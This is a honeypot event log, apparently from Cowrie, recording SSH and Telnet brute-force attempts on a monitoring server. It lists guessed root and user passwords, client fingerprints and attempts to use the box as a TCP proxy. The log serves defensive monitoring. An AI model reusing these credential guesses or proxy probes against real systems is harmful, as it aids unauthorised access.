{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"13:3a:bd:20:2d:ec:1f:76:2f:f4:df:60:b2:94:1b:a8","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAm4OL3t9/CKCXnaS1FqMqVBZtIctaDGfNTwkBypjk7LskJYRJn+y+dykldCNGmtRuNBCsBpzVIvY69ap4AX2h02FBhhngnOZl/P7so4JNo0EBVdeb8tps7fJryXFvbSFv5J+9OlbXa35aKQFPE1G4rQ7KM9cnUXnRtsZz/TPRwx7HRBPlM0FajN48djc2yQaHPtzustZ4YC6NMuadaZZlRMf5+HF6lpdHdsMmLuSlYBigRc1yI9OSlpFSQMxpqyCTiiPO8jOuoARu8ZT5cWzWcjce1oJ7t8IlklCPMnwtjFLdNCQsthXQU86s+5iey0Yons4WC5RW/zaDKStdGvq0qw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 13:3a:bd:20:2d:ec:1f:76:2f:f4:df:60:b2:94:1b:a8","sensor":"my-vps","timestamp":"2025-08-26T23:41:10.587817Z","src_ip":"212.227.235.229","session":"b7efb8fc81bd"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"13:3a:bd:20:2d:ec:1f:76:2f:f4:df:60:b2:94:1b:a8","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAm4OL3t9/CKCXnaS1FqMqVBZtIctaDGfNTwkBypjk7LskJYRJn+y+dykldCNGmtRuNBCsBpzVIvY69ap4AX2h02FBhhngnOZl/P7so4JNo0EBVdeb8tps7fJryXFvbSFv5J+9OlbXa35aKQFPE1G4rQ7KM9cnUXnRtsZz/TPRwx7HRBPlM0FajN48djc2yQaHPtzustZ4YC6NMuadaZZlRMf5+HF6lpdHdsMmLuSlYBigRc1yI9OSlpFSQMxpqyCTiiPO8jOuoARu8ZT5cWzWcjce1oJ7t8IlklCPMnwtjFLdNCQsthXQU86s+5iey0Yons4WC5RW/zaDKStdGvq0qw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T23:41:10.588678Z","src_ip":"212.227.235.229","session":"b7efb8fc81bd"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"13:3a:bd:20:2d:ec:1f:76:2f:f4:df:60:b2:94:1b:a8","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAm4OL3t9/CKCXnaS1FqMqVBZtIctaDGfNTwkBypjk7LskJYRJn+y+dykldCNGmtRuNBCsBpzVIvY69ap4AX2h02FBhhngnOZl/P7so4JNo0EBVdeb8tps7fJryXFvbSFv5J+9OlbXa35aKQFPE1G4rQ7KM9cnUXnRtsZz/TPRwx7HRBPlM0FajN48djc2yQaHPtzustZ4YC6NMuadaZZlRMf5+HF6lpdHdsMmLuSlYBigRc1yI9OSlpFSQMxpqyCTiiPO8jOuoARu8ZT5cWzWcjce1oJ7t8IlklCPMnwtjFLdNCQsthXQU86s+5iey0Yons4WC5RW/zaDKStdGvq0qw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 13:3a:bd:20:2d:ec:1f:76:2f:f4:df:60:b2:94:1b:a8","sensor":"my-vps","timestamp":"2025-08-26T23:41:10.677937Z","src_ip":"212.227.235.229","session":"b7efb8fc81bd"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"13:3a:bd:20:2d:ec:1f:76:2f:f4:df:60:b2:94:1b:a8","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAm4OL3t9/CKCXnaS1FqMqVBZtIctaDGfNTwkBypjk7LskJYRJn+y+dykldCNGmtRuNBCsBpzVIvY69ap4AX2h02FBhhngnOZl/P7so4JNo0EBVdeb8tps7fJryXFvbSFv5J+9OlbXa35aKQFPE1G4rQ7KM9cnUXnRtsZz/TPRwx7HRBPlM0FajN48djc2yQaHPtzustZ4YC6NMuadaZZlRMf5+HF6lpdHdsMmLuSlYBigRc1yI9OSlpFSQMxpqyCTiiPO8jOuoARu8ZT5cWzWcjce1oJ7t8IlklCPMnwtjFLdNCQsthXQU86s+5iey0Yons4WC5RW/zaDKStdGvq0qw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T23:41:10.678608Z","src_ip":"212.227.235.229","session":"b7efb8fc81bd"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":33006,"dst_ip":"1.2.3.4","dst_port":23,"session":"fceed5ec4b80","protocol":"telnet","message":"New connection: 79.124.8.120:33006 (1.2.3.4:23) [session: fceed5ec4b80]","sensor":"my-vps","timestamp":"2025-08-26T23:41:12.399447Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:41:12.439136Z","src_ip":"79.124.8.120","session":"fceed5ec4b80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:41:12.503393Z","src_ip":"79.124.8.120","session":"fceed5ec4b80"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:41:20.319084Z","src_ip":"212.227.235.229","session":"b7efb8fc81bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60505,"dst_ip":"1.2.3.4","dst_port":22,"session":"00134e9460df","protocol":"ssh","message":"New connection: 212.227.125.160:60505 (1.2.3.4:22) [session: 00134e9460df]","sensor":"my-vps","timestamp":"2025-08-26T23:41:23.243891Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:41:23.244957Z","src_ip":"212.227.125.160","session":"00134e9460df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60774,"dst_ip":"1.2.3.4","dst_port":22,"session":"b54852ebc738","protocol":"ssh","message":"New connection: 212.227.125.160:60774 (1.2.3.4:22) [session: b54852ebc738]","sensor":"my-vps","timestamp":"2025-08-26T23:41:23.358407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:41:23.359570Z","src_ip":"212.227.125.160","session":"b54852ebc738"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T23:41:23.476036Z","src_ip":"212.227.125.160","session":"b54852ebc738"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39342,"dst_ip":"1.2.3.4","dst_port":22,"session":"ace3225b3cf9","protocol":"ssh","message":"New connection: 212.227.235.229:39342 (1.2.3.4:22) [session: ace3225b3cf9]","sensor":"my-vps","timestamp":"2025-08-26T23:41:23.795018Z"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:41:23.819462Z","src_ip":"212.227.125.160","session":"b54852ebc738"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T23:41:23.934378Z","session":"b54852ebc738"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62033,"dst_ip":"1.2.3.4","dst_port":22,"session":"efb40e881114","protocol":"ssh","message":"New connection: 212.227.235.229:62033 (1.2.3.4:22) [session: efb40e881114]","sensor":"my-vps","timestamp":"2025-08-26T23:41:24.889282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T23:41:24.889863Z","src_ip":"212.227.235.229","session":"efb40e881114"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:41:25.017265Z","src_ip":"212.227.235.229","session":"ace3225b3cf9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:41:25.019324Z","src_ip":"212.227.235.229","session":"ace3225b3cf9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T23:41:25.045822Z","src_ip":"212.227.235.229","session":"efb40e881114"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey","message":"login attempt [chelsey/chelsey] failed","sensor":"my-vps","timestamp":"2025-08-26T23:41:26.553829Z","src_ip":"212.227.235.229","session":"efb40e881114"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey1","message":"login attempt [chelsey/chelsey1] failed","sensor":"my-vps","timestamp":"2025-08-26T23:41:27.712070Z","src_ip":"212.227.235.229","session":"efb40e881114"}
{"eventid":"cowrie.login.failed","username":"test","password":"4321","message":"login attempt [test/4321] failed","sensor":"my-vps","timestamp":"2025-08-26T23:41:28.148624Z","src_ip":"212.227.235.229","session":"ace3225b3cf9"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey123","message":"login attempt [chelsey/chelsey123] failed","sensor":"my-vps","timestamp":"2025-08-26T23:41:28.870171Z","src_ip":"212.227.235.229","session":"efb40e881114"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey1234","message":"login attempt [chelsey/chelsey1234] failed","sensor":"my-vps","timestamp":"2025-08-26T23:41:30.022996Z","src_ip":"212.227.235.229","session":"efb40e881114"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:41:31.062537Z","src_ip":"212.227.235.229","session":"ace3225b3cf9"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey12345","message":"login attempt [chelsey/chelsey12345] failed","sensor":"my-vps","timestamp":"2025-08-26T23:41:31.181821Z","src_ip":"212.227.235.229","session":"efb40e881114"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:41:32.341130Z","src_ip":"212.227.235.229","session":"efb40e881114"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:42:33.359030Z","src_ip":"212.227.125.160","session":"b54852ebc738"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50646,"dst_ip":"1.2.3.4","dst_port":22,"session":"e286b30ae0e7","protocol":"ssh","message":"New connection: 212.227.235.229:50646 (1.2.3.4:22) [session: e286b30ae0e7]","sensor":"my-vps","timestamp":"2025-08-26T23:43:41.683003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:43:43.113183Z","src_ip":"212.227.235.229","session":"e286b30ae0e7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:43:43.113932Z","src_ip":"212.227.235.229","session":"e286b30ae0e7"}
{"eventid":"cowrie.login.failed","username":"test","password":"321","message":"login attempt [test/321] failed","sensor":"my-vps","timestamp":"2025-08-26T23:43:47.279895Z","src_ip":"212.227.235.229","session":"e286b30ae0e7"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:43:49.102761Z","src_ip":"212.227.235.229","session":"e286b30ae0e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:44:12.527986Z","src_ip":"79.124.8.120","session":"fceed5ec4b80"}
{"eventid":"cowrie.session.closed","duration":180.13244032859802,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:44:12.531799Z","src_ip":"79.124.8.120","session":"fceed5ec4b80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52760,"dst_ip":"1.2.3.4","dst_port":23,"session":"cdc965e54761","protocol":"telnet","message":"New connection: 212.227.235.229:52760 (1.2.3.4:23) [session: cdc965e54761]","sensor":"my-vps","timestamp":"2025-08-26T23:44:15.937550Z"}
{"eventid":"cowrie.session.closed","duration":31.663439750671387,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:44:47.600866Z","src_ip":"212.227.235.229","session":"cdc965e54761"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58560,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a28d8dfd236","protocol":"ssh","message":"New connection: 212.227.235.229:58560 (1.2.3.4:22) [session: 9a28d8dfd236]","sensor":"my-vps","timestamp":"2025-08-26T23:45:58.259845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:45:59.610791Z","src_ip":"212.227.235.229","session":"9a28d8dfd236"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:45:59.611549Z","src_ip":"212.227.235.229","session":"9a28d8dfd236"}
{"eventid":"cowrie.login.failed","username":"test","password":"21","message":"login attempt [test/21] failed","sensor":"my-vps","timestamp":"2025-08-26T23:46:05.939347Z","src_ip":"212.227.235.229","session":"9a28d8dfd236"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:46:08.517883Z","src_ip":"212.227.235.229","session":"9a28d8dfd236"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23438,"dst_ip":"1.2.3.4","dst_port":22,"session":"45b7dfb6c77a","protocol":"ssh","message":"New connection: 213.209.150.239:23438 (1.2.3.4:22) [session: 45b7dfb6c77a]","sensor":"my-vps","timestamp":"2025-08-26T23:46:35.771243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:46:35.772136Z","src_ip":"213.209.150.239","session":"45b7dfb6c77a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T23:46:35.819066Z","src_ip":"213.209.150.239","session":"45b7dfb6c77a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:46:36.053798Z","src_ip":"213.209.150.239","session":"45b7dfb6c77a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":18654,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:18654","sensor":"my-vps","timestamp":"2025-08-26T23:46:36.102453Z","session":"45b7dfb6c77a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:46:36.149691Z","src_ip":"213.209.150.239","session":"45b7dfb6c77a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18573,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18573","sensor":"my-vps","timestamp":"2025-08-26T23:46:36.285384Z","session":"45b7dfb6c77a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:46:36.332772Z","src_ip":"213.209.150.239","session":"45b7dfb6c77a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:46:36.380853Z","src_ip":"213.209.150.239","session":"45b7dfb6c77a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52846,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c841d09ea04","protocol":"ssh","message":"New connection: 217.72.205.35:52846 (1.2.3.4:22) [session: 8c841d09ea04]","sensor":"my-vps","timestamp":"2025-08-26T23:47:55.009647Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:47:55.010725Z","src_ip":"217.72.205.35","session":"8c841d09ea04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41766,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bbf59b217db","protocol":"ssh","message":"New connection: 212.227.235.229:41766 (1.2.3.4:22) [session: 2bbf59b217db]","sensor":"my-vps","timestamp":"2025-08-26T23:48:19.292247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:48:20.716861Z","src_ip":"212.227.235.229","session":"2bbf59b217db"}
